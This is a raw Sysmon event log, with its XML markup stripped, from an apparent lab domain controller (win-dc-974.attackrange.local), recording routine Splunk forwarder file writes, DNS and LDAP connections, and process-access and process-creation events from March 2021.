Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60202-false10.0.1.12-8000- 23542300x80000000000000002245202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:47.082{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC62938BCF1DF06A653428A06C204708,SHA256=D789748E1D754C550781007809CE9CDBC9341B73327F1B1D9B42E95BF115E631,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:48.985{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=116A93F157F2164F56CF07EB1287AB37,SHA256=2F287A758B47FE5607711731535A94C0AF937820C8964C3AA64A213D0933FC10,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:38.893{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56633- 23542300x80000000000000002245205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:48.764{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B975E9383620B07356502E10C492F68C,SHA256=377D5C95EB95556F3CA038C19D15F6811C63A82D56700243E4827ABACB4B852F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:39.908{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56633- 23542300x80000000000000002245208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:49.783{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4E22F8236388903BCE781E4E03A7AED,SHA256=615648982AFA7FCB89DF717F03A750F0BE92BC0A70E32CA27E3BB022D40ED6E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:50.858{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=254970791CFAEA61864E398E227C867B,SHA256=B8B19C80B741D3295CA30A039EB8AF6D5A951C6734E4350108EAABB634A98CA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:49.998{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67EEB268769BB1E30FB732258C49C30F,SHA256=A19125076570BBA45B69CD996CF0225E37560564423D086AA4F599ADD687EA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:51.045{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83EDFDBF2C0537E99BA8AC9B2679BE32,SHA256=C82FDC7A882AFBB44CAFCFFC072D9142C5C4A91C3D751E4964A8C512F4EBEBBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:52.174{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA05A09B4582C52D2A256E6A28C409B3,SHA256=B0AEAEB7A462FE2E126CD868CEC84A5BE480B26688BC01F757FA87BEFE6C2208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:52.061{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9835BA7F9953D28AE01FF0097A5DDAC4,SHA256=9C583608BD33020F0522B457718DB243ED6DF527DC6EDCE6AA17B4612117EBD9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:40.987{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60203-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002245213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:40.987{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60203-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002245218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:42.299{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60204-false10.0.1.12-8000- 23542300x80000000000000002245217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:53.080{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C254A847E0203ADABD60811173B64477,SHA256=FD29B3FD9170077931B0BC31CC8FECEFE301E7F146777940ADFEA28D46102657,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.905{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E56-603E-07AB-00000000AD01}14592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.905{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.905{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.905{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.905{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.905{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E56-603E-07AB-00000000AD01}14592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.905{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E56-603E-07AB-00000000AD01}14592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.906{05ADC7E1-6E56-603E-07AB-00000000AD01}14592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002245227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.420{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E56-603E-06AB-00000000AD01}14928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.405{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6E56-603E-06AB-00000000AD01}14928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.405{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E56-603E-06AB-00000000AD01}14928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.406{05ADC7E1-6E56-603E-06AB-00000000AD01}14928C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:54.108{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34301C3B79E9D3A412F9A1C224B1881B,SHA256=AD3C57B7947DFBA60ADD986888A034E1D698607B9E9D849D4E7FFFF1ED139146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A16E800D7AADE8221219E0E04E48FA6,SHA256=86472C7AACDAC914490D3E6149DB6D8013C0F09F5A01D6BE66E9506D77987E55,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.405{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E57-603E-08AB-00000000AD01}10624C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 